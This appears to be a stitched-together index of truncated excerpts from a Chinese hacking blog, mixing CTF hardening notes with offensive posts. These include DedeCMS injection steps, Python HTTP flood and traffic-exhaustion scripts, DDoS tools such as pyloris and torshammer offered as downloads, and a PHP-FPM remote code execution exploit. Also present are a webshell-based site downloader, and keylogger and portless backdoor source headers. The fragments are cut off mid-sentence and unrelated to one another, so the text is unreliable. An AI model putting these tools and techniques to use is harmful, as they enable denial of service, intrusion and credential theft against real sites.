Yatere的天平秤

一. 前言随着CTF的普及，比赛的形式也有了越来越多的花样，对于线下赛来说，开始出现了安全加固或者防御战之类的环节，亦或者因为拿下靶机后不希望其他攻击者进入而进行“争夺”，无论什么形式，这些都需要我们对于服务器的防护工作有所了解。对于线下赛，笔者虽说没有什么很高超的攻防技巧，但也是有着一些自己的心得。本文总结了一些CTF线下赛中常用的服务器加固姿势，希望能对各位CTF朋友们有所帮助。环境针

一个协议fuzzer工具，支持文件fuzzer。研究模糊化的人可以参考代码。也是用python写的。https://github.com/localh0t/backfuzz可以翻墙看看这个：http://localh0t.blogspot.com/2012/03/backfuzz-protocol-fuzzing-toolkit.html

Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032  Possible MS12-032 Proof of concept from StackOverflow thx to @avivra   We discovered that running ou

实验环境如下：服务器IP:61.183.254.254客户机IP:192.168.1.105Http代理服务器:202.103.24.68  端口：8080现象：   客户机可以ping得通外网服务器，但是却无法上网，出口过滤tcp和udp。目的：客户机可以正常上网。服务器：C:\>ptunnel.exe -v 4 -c "\Device\NPF_{

import socketserver,osPORT = 23class Handler(socketserver.BaseRequestHandler): def handle(self): while True: t='' self.data = self.request.recv(1024).strip()

漏洞类型：注入漏洞、上传漏洞漏洞描述：百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”，获得使用DeDeCMS系统的网站。　　注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，然后访问“/member/ajax_membergroup.php?action=post&membergro

本人是py3.2 调用的是bing数据库,httplib2 和 bs4 模块可以网上找找。httplib2支持压缩，所以用他了，默认的不支持。import sys,osfrom bs4 import BeautifulSoupimport httplib2import urllib.parse as upip=sys.argv[1]os.chdir(sys.pat

torshammerwin32 可执行exe下载：http://howfile.com/file/2611e8a1/9c6c9f8f/是针对慢速 post的攻击，针对apache兼职是绝杀socket.py"""SocksiPy - Python SOCKS module.Version 1.00Copyright 2006 D

介绍:matriux是一个Live CD。是由一组开源和免费的程序和许多安全工具组成，可用于各种用途，但不仅限于这些，渗透测试，道德黑客（黑客防御），系统管理和网络法律研究，安全性测试，脆弱性分析，等等。可以用于各种用途的专业安全人员，他也可作为您的默认操作系统。有了Matriux，你可以做任何系统的渗透测试，以及所有的功能强大的平台，而无需您的硬盘驱动器上安装任何程序。matri

pyloris-3.2 是一款用python写的http等多协议ddos软件，经过测试发现威力巨大啊。难怪Anonymous的黑客系统里面自带这个，我已经把它用py2exe转换成exe了，需要的可以下载。官网：http://sourceforge.net/projects/pyloris/PyLoris is a scriptable tool for testing a

Anonymous已经是大名鼎鼎了吧，最近Anonymous发布了命名为Anonymous-OS的操作系统，基于Ubuntu 11.10，提供各种web渗透测试工具，包括：- ParolaPass Password Generator- Find Host IP- Anonymous HOIC- Ddosim- Pyloris- Slowloris-

不得不说，效率比我用vc写的是要差多了，线程多了还会报错，配合python的http服务器可以查看效果。毕竟走的不是底层。但是还好，至少本地测试还是明显感觉到效果了。import urllib.request as urimport threading,random,sysurl=sys.argv[1]class mycc(threading.Thread):

expression的变形千变万化，只需要根据CSS Parser进行FUZZER就能挖掘很多WEBMAIL的XSS 0DAY。 下面是几个我记得的例子： 1.IE的CSS语法解析很宽松，导致的执行代码的特例。  .ExternalClass #ecxx {color:rgb(''zzzz"x:expression(alert());}   2

下载地址：http://code.google.com/p/raft/RAFT is a testing tool for the identification of vulnerabilities in web applications.RAFT is a suite of tools that utilize common shared elemen

http://seclists.org/oss-sec/2012/q2/493我今天早上打开电脑,在seclists中看到一个很惊人的thread:http://seclists.org/oss-sec/2012/q2/493MySQL爆出了一个很大的安全漏洞，几乎影响5.1至5.5的所有版本。出问题的模块是登录时密码校验的部分(password.c)，在知道用户名的情况下（如

项目地址：https://github.com/OffensivePython/PinjectRaw Packet Injection tool比起scrpy 起来简单多了，当然功能不如他，但是自己写一些raw的程序经测试笔scrpy快很多。注:windows下不支持sock raw.例子： # IP Header ipobj = IP(src_host, dst_ho

经常有朋友用lcx的，但是由于很多原因可能都不好使，例如 ：1.linux下能用lcx，有时只能拿msf出来。（golang的程序跨平台，甚至嵌入式linux都支持。）2.不免杀  （基本上目前golang 语言不会被当病毒）3.每次内网要从新连接其他主机时候，必须从进去从新敲打命令 ，操作过多任意被发现。（肉鸡只用操作一次，其他都交给主控端操作了）最近正好都碰上了，于是自

软件介绍： 本身为独立执行程序，跨平台，可以充当正常dns服务器。默认情况下，本程序只篡改MX（邮件交换记录）为特定主机。作用：本软件 与 本博客前文中的 smtp 中继监控服务器程序 结合来实施攻击,特别在内网中。其他：如果需要实现高级的基于特定域名的篡改，修改代码即可。package mainimport ( "fmt" "github.

import reimport sysimport base64, codecsfrom random import random, randrange, choice, shuffle, randintfrom collections import *from inspect import getargspecdef random_string(charset = 'abcdefgh

# -*- coding: gb18030 -*-from subprocess import *import socket,httplib2import sys,os,socket,threadingfrom bs34 import BeautifulSoup34import json,urllib2,urllibfrom urlparse import urlparse as u

软件作用：1.自动旁注指定IP段，收集旁注信息，并自动保存为文本文件方便以后查看。2.自动多线程针对第一步骤的网站结果调用wwwscan进行扫描。(可以自己定义多少线程)全部都是自动化完成。程序界面如下:代码如下：from tkinter import *import httplib2,os,queue,threading,sys,socket,time,

某目标网站，为虚拟主机，如果ISP限制月流量为20G，那么我们可以在短暂1-2天内消耗完其流量。(取决于你的机器)方法原理如下：1.找到目标网站大文件（页面）地址2.多线程访问（下载）该地址(注意：由于完全是出于模拟真实用户，所以不会被防火墙屏蔽掉)（以下以hao123为例子而已）一： 其中以上思路中的第一点 可以通过google浏览器的审计功能实现

/* PHP FactCGI Remote Code Execute Exploit* Date: 2012-09-15* Author: wofeiwo@80sec.com* Affected: All PHP-FPM exposed outsie, but "system" cmd only affects >=5.3.3* !!Note: Only for research purp

以前dz2漏洞，结果今天看到这个函数，就把老文转过来，方便自己备份preg_replace函数原型：mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])特别说明：/e 修正符使 preg_replace() 将 replace

如果有小马了，就可以用本程序下载全站程序。代码如下：import urllib.request as urimport urllib.parse as upimport threading,queue,os,sysque=queue.Queue()os.chdir(sys.path[0])key='pass' #小马的密码url=r'http://localhost/te

版本：Drupal Drupal 7.xhttp://localhost/?q[]=x-------------------------------------Hotfix:Search for:$path = trim($path, '/');And add the following line above:if(is_

昨天有朋友发了个法国佬写的神器叫 mimikatz 让我们看下神器下载地址: mimikatz_trunk.zip还有一篇用这个神器直接从 lsass.exe 里获取windows处于active状态账号明文密码的文章http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from

Mongodb，这么火的玩意其实早就想好好研究一下了。之前一直没空仔细学学新的东西，总是感觉精力不足。这次趁着买了一本书，就零零散散地在VPS上搭建、测试、看实现代码。感觉也蛮有意思的一个数据库。虽然感觉它非常简单，尤其是看代码的时候更是感觉如此。但这不也是另一个KISS的典范么，还是简单但是实用的东西最能流行。既然都看了其实现，也不能不产出点什么。正好多年没更新博文，就简单分析一下mon

//**********************************************************************// Version: V1.0// Coder: WinEggDrop// Date Release: NULL// Purpose: Hookless Keylogger// Test PlatForm: Win 2K Pro And Ser

//**********************************************************************// Version: V1.0// Coder: WinEggDrop// Date Release: NULL// Purpose: To Demonstrate Some Portless Backdoor Technique// Test

<!----><!--@font-face {font-family:宋体}@font-face {font-family:"\@宋体"}p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0cm; margin-bottom:.0001pt; text-align:justify; text-justi

最近，除了国内明文密码的安全事件，还有一个事是比较大的，那就是Hash Collision DoS （Hash碰撞的拒绝式服务攻击），有恶意的人会通过这个安全弱点会让你的服务器运行巨慢无比。这个安全弱点利用了各语言的Hash算法的“非随机性”可以制造出N多的value不一样，但是key一样数据，然后让你的Hash表成为一张单向链表，而导致你的整个网站或是程序的运行性能以级数下降（可以很轻松的让你的

首先你要知道怎么利用JMP ESP的方式其利用格式是ORS，这里O=NOP，R=RET（jmp esp的地址），S=ShellCode。就是把缓冲区一直覆盖成NOP（空指令，什么都不做），直到原来的EIP位置时，JJMP ESP，紧跟后面才是我们的ShellCode。 这种方式执行到ShellCode的原理：正常情况下，函数返回时，RET，等于POP EIP，即回复原来PUSH的EIP

文/玄魂1.Hash与Hash碰撞       Hash，简单来讲，是一种将任意长度的输入变换成固定长度的输出，固定长度的输出在“实际应用场景”下可以代表该输入。Hash函数通常被翻译成散列函数。Hash通常用来校验信息的一致性。Hash函数的实现多种多样，在安全领域应用最为广泛的是SHA-x系列和MDx系列。Hash函数也划分为带密钥的Hash函数和不带密钥的Hash函数

S- serv提权方式人人都会用了，搞得现在的主机都配置得非常安全，看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一，还有其他的 pcanywhere获取密码，替换服务，等等。但是现在也没这么好搞了，随着安全意识的提高，之前的方式估计不怎么管用，现在我给大家介绍一下一种新的提权方式，看过古典LM做的那动画的朋友都知道吧？利用MYSQLl弱口令拿到系统权限，在WEBSHEL上也可实现，不

需要s.exe 和scan.exe不懂的就别看了。下面是bat配套和vbs配套脚本单进程多线程版：@echo offsetlocal enabledelayedexpansion@cd /d "%~dp0":startTitle

众所周知，因使用简单、客户群多，织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息：“DEDECMS爆严重安全漏洞，近期官方会发布相关补丁，望大家及时关注补丁动态。”bug被利用步骤如下：http://www.ywen.info/网站后台/

Fuzzing技术源于软件测试中的黑盒测试技术，它的基本思想是把一组随机数据作为程序的输入，并监视程序运行过程中的任何异常，通过记录导致异常的输入数据进一步定位软件中缺陷的位置。1990年Miller等人发现，通过简单的Fuzzing可以使运行于UNIX系统上的多于25%的程序崩

<br /><br />　1.Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机就为这些源主机建立了大量的连接队列，而且由于没有收到ACK一直维护着这些队列，造成了资源的大量消耗而不能向正常请求提供服务。<br />　　2.Smurf：该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求)的包，并且将源地址伪装成想要攻击的主机地址。子网上所有主机都回应广播包请求而向被攻击主机发包，使该主机受到攻击。<br />　　3

<br />“The-Cat-is-Out-of-The-Bag” DNS Bug<br />Wednesday July 23, 2008 at 1:48 pm CST<br />Posted by Ravi Balupari<br /><br />Trackback<br />There has been a lot of hush-hush recently regarding a DNS security issue finding by Dan Kaminsky. Industry wide co